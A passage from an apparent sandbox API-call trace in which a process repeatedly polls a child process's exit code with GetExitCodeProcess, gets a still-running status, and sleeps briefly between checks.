(dwMilliseconds=0x19) [0146.225] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0146.225] Sleep (dwMilliseconds=0x19) [0146.311] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0146.311] Sleep (dwMilliseconds=0x19) [0146.351] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0146.351] Sleep (dwMilliseconds=0x19) [0146.379] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0146.379] Sleep (dwMilliseconds=0x19) [0146.415] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0146.415] Sleep (dwMilliseconds=0x19) [0146.464] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0146.464] Sleep (dwMilliseconds=0x19) [0146.495] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0146.495] Sleep (dwMilliseconds=0x19) [0146.530] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0146.530] Sleep (dwMilliseconds=0x19) [0146.558] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0146.558] Sleep (dwMilliseconds=0x19) [0146.600] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0146.600] Sleep (dwMilliseconds=0x19) [0146.635] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0146.635] Sleep (dwMilliseconds=0x19) [0146.690] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0146.690] Sleep (dwMilliseconds=0x19) [0146.727] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0146.727] Sleep (dwMilliseconds=0x19) [0146.754] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0146.754] Sleep (dwMilliseconds=0x19) [0146.783] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0146.783] Sleep (dwMilliseconds=0x19) [0146.816] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0146.816] Sleep (dwMilliseconds=0x19) [0146.848] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0146.848] Sleep (dwMilliseconds=0x19) [0146.887] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0146.887] Sleep (dwMilliseconds=0x19) [0147.055] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0147.055] Sleep (dwMilliseconds=0x19) [0147.142] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0147.142] Sleep (dwMilliseconds=0x19) [0147.220] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0147.220] Sleep (dwMilliseconds=0x19) [0147.260] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0147.260] Sleep (dwMilliseconds=0x19) [0147.340] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0147.340] Sleep (dwMilliseconds=0x19) [0147.372] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0147.372] Sleep (dwMilliseconds=0x19) [0147.403] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0147.403] Sleep (dwMilliseconds=0x19) [0147.555] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0147.556] Sleep (dwMilliseconds=0x19) [0147.591] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0147.592] Sleep (dwMilliseconds=0x19) [0147.625] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0147.625] Sleep (dwMilliseconds=0x19) [0147.671] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0147.671] Sleep (dwMilliseconds=0x19) [0147.710] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0147.710] Sleep (dwMilliseconds=0x19) [0147.784] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0147.784] Sleep (dwMilliseconds=0x19) [0147.814] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0147.814] Sleep (dwMilliseconds=0x19) [0147.841] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0147.841] Sleep (dwMilliseconds=0x19) [0147.918] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0147.918] Sleep (dwMilliseconds=0x19) [0147.967] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0147.967] Sleep (dwMilliseconds=0x19) [0148.094] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0148.094] Sleep (dwMilliseconds=0x19) [0148.120] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0148.120] Sleep (dwMilliseconds=0x19) [0148.149] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0148.149] Sleep (dwMilliseconds=0x19) [0148.215] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0148.215] Sleep (dwMilliseconds=0x19) [0148.267] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0148.268] Sleep (dwMilliseconds=0x19) [0148.352] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0148.352] Sleep (dwMilliseconds=0x19) [0148.432] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0148.432] Sleep (dwMilliseconds=0x19) [0148.468] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0148.469] Sleep (dwMilliseconds=0x19) [0148.498] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0148.498] Sleep (dwMilliseconds=0x19) [0148.527] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0148.527] Sleep (dwMilliseconds=0x19) [0148.572] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0148.572] Sleep (dwMilliseconds=0x19) [0148.686] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0148.686] Sleep (dwMilliseconds=0x19) [0148.723] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0148.723] Sleep (dwMilliseconds=0x19) [0148.854] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0148.856] Sleep (dwMilliseconds=0x19) [0148.922] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0148.922] Sleep (dwMilliseconds=0x19) [0148.976] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0148.976] Sleep (dwMilliseconds=0x19) [0149.076] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0149.076] Sleep (dwMilliseconds=0x19) [0149.151] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0149.153] Sleep (dwMilliseconds=0x19) [0149.188] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0149.188] Sleep (dwMilliseconds=0x19) [0149.256] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0149.256] Sleep (dwMilliseconds=0x19) [0149.299] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0149.299] Sleep (dwMilliseconds=0x19) [0149.346] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0149.346] Sleep (dwMilliseconds=0x19) [0149.544] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0149.544] Sleep (dwMilliseconds=0x19) [0149.616] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0149.616] Sleep (dwMilliseconds=0x19) [0149.657] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0149.657] Sleep (dwMilliseconds=0x19) [0149.711] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0149.711] Sleep (dwMilliseconds=0x19) [0150.016] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0150.021] Sleep (dwMilliseconds=0x19) [0150.151] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0150.151] Sleep (dwMilliseconds=0x19) [0150.217] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0150.217] Sleep (dwMilliseconds=0x19) [0150.263] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0150.263] Sleep (dwMilliseconds=0x19) [0150.341] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0150.341] Sleep (dwMilliseconds=0x19) [0150.389] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0150.389] Sleep (dwMilliseconds=0x19) [0150.423] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0150.423] Sleep (dwMilliseconds=0x19) [0150.469] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0150.469] Sleep (dwMilliseconds=0x19) [0150.542] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0150.542] Sleep (dwMilliseconds=0x19) [0150.574] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0150.574] Sleep (dwMilliseconds=0x19) [0150.610] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0150.610] Sleep (dwMilliseconds=0x19) [0150.639] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0150.639] Sleep (dwMilliseconds=0x19) [0150.673] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0150.673] Sleep (dwMilliseconds=0x19) [0150.707] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0150.708] Sleep (dwMilliseconds=0x19) [0150.776] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0150.776] Sleep (dwMilliseconds=0x19) [0150.803] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0150.803] Sleep (dwMilliseconds=0x19) [0150.841] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0150.841] Sleep (dwMilliseconds=0x19) [0150.928] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0150.928] Sleep (dwMilliseconds=0x19) [0151.090] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0151.090] Sleep (dwMilliseconds=0x19) [0151.130] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0151.130] Sleep (dwMilliseconds=0x19) [0151.182] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0151.182] Sleep (dwMilliseconds=0x19) [0151.216] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0151.216] Sleep (dwMilliseconds=0x19) [0151.248] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0151.248] Sleep (dwMilliseconds=0x19) [0151.276] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0151.276] Sleep (dwMilliseconds=0x19) [0151.314] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0151.314] Sleep (dwMilliseconds=0x19) [0151.351] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0151.351] Sleep (dwMilliseconds=0x19) [0151.532] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0151.532] Sleep (dwMilliseconds=0x19) [0151.580] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0151.580] Sleep (dwMilliseconds=0x19) [0151.616] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0151.617] Sleep (dwMilliseconds=0x19) [0151.648] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0151.649] Sleep (dwMilliseconds=0x19) [0151.679] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0151.679] Sleep (dwMilliseconds=0x19) [0151.710] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0151.710] Sleep (dwMilliseconds=0x19) [0151.761] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0151.762] Sleep (dwMilliseconds=0x19) [0151.801] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0151.801] Sleep (dwMilliseconds=0x19) [0151.854] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0151.855] Sleep (dwMilliseconds=0x19) [0151.931] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0151.931] Sleep (dwMilliseconds=0x19) [0152.002] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0152.002] Sleep (dwMilliseconds=0x19) [0152.090] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0152.090] Sleep (dwMilliseconds=0x19) [0152.130] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0152.130] Sleep (dwMilliseconds=0x19) [0152.252] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0152.252] Sleep (dwMilliseconds=0x19) [0152.315] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0152.315] Sleep (dwMilliseconds=0x19) [0152.360] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0152.360] Sleep (dwMilliseconds=0x19) [0152.402] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0152.402] Sleep (dwMilliseconds=0x19) [0152.440] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0152.440] Sleep (dwMilliseconds=0x19) [0152.503] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0152.503] Sleep (dwMilliseconds=0x19) [0152.540] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0152.540] Sleep (dwMilliseconds=0x19) [0152.577] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0152.577] Sleep (dwMilliseconds=0x19) [0152.616] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0152.617] Sleep (dwMilliseconds=0x19) [0152.652] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0152.652] Sleep (dwMilliseconds=0x19) [0152.687] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0152.687] Sleep (dwMilliseconds=0x19) [0152.724] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0152.724] Sleep (dwMilliseconds=0x19) [0152.761] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0152.762] Sleep (dwMilliseconds=0x19) [0152.797] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0152.797] Sleep (dwMilliseconds=0x19) [0152.833] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0152.833] Sleep (dwMilliseconds=0x19) [0152.882] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0152.883] Sleep (dwMilliseconds=0x19) [0152.920] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0152.920] Sleep (dwMilliseconds=0x19) [0152.960] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0152.960] Sleep (dwMilliseconds=0x19) [0153.056] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0153.056] Sleep (dwMilliseconds=0x19) [0153.094] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0153.094] Sleep (dwMilliseconds=0x19) [0153.132] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0153.132] Sleep (dwMilliseconds=0x19) [0153.168] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0153.169] Sleep (dwMilliseconds=0x19) [0153.204] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0153.204] Sleep (dwMilliseconds=0x19) [0153.249] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0153.249] Sleep (dwMilliseconds=0x19) [0153.287] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0153.287] Sleep (dwMilliseconds=0x19) [0153.327] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0153.327] Sleep (dwMilliseconds=0x19) [0153.487] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0153.487] Sleep (dwMilliseconds=0x19) [0153.530] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0153.530] Sleep (dwMilliseconds=0x19) [0153.567] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0153.567] Sleep (dwMilliseconds=0x19) [0153.677] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0153.678] Sleep (dwMilliseconds=0x19) [0153.733] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0153.734] Sleep (dwMilliseconds=0x19) [0153.777] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0153.777] Sleep (dwMilliseconds=0x19) [0153.847] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0153.847] Sleep (dwMilliseconds=0x19) [0153.939] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0153.939] Sleep (dwMilliseconds=0x19) [0153.974] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0153.974] Sleep (dwMilliseconds=0x19) [0154.020] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0154.020] Sleep (dwMilliseconds=0x19) [0154.135] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0154.135] Sleep (dwMilliseconds=0x19) [0154.170] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0154.170] Sleep (dwMilliseconds=0x19) [0154.207] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0154.208] Sleep (dwMilliseconds=0x19) [0154.264] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0154.264] Sleep (dwMilliseconds=0x19) [0154.303] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0154.304] Sleep (dwMilliseconds=0x19) [0154.339] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0154.339] Sleep (dwMilliseconds=0x19) [0154.375] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0154.375] Sleep (dwMilliseconds=0x19) [0154.411] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0154.411] Sleep (dwMilliseconds=0x19) [0154.452] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0154.452] Sleep (dwMilliseconds=0x19) [0154.490] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0154.490] Sleep (dwMilliseconds=0x19) [0154.686] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0154.686] Sleep (dwMilliseconds=0x19) [0154.741] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0154.741] Sleep (dwMilliseconds=0x19) [0154.779] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0154.780] Sleep (dwMilliseconds=0x19) [0154.914] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0154.914] Sleep (dwMilliseconds=0x19) [0154.976] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0154.976] Sleep (dwMilliseconds=0x19) [0155.085] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0155.085] Sleep (dwMilliseconds=0x19) [0155.124] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0155.125] Sleep (dwMilliseconds=0x19) [0155.171] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0155.171] Sleep (dwMilliseconds=0x19) [0155.222] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0155.222] Sleep (dwMilliseconds=0x19) [0155.268] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0155.268] Sleep (dwMilliseconds=0x19) [0155.308] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0155.308] Sleep (dwMilliseconds=0x19) [0155.357] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0155.357] Sleep (dwMilliseconds=0x19) [0155.419] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0155.419] Sleep (dwMilliseconds=0x19) [0155.459] GetExitCodeProcess (in: hProcess=0x40c, 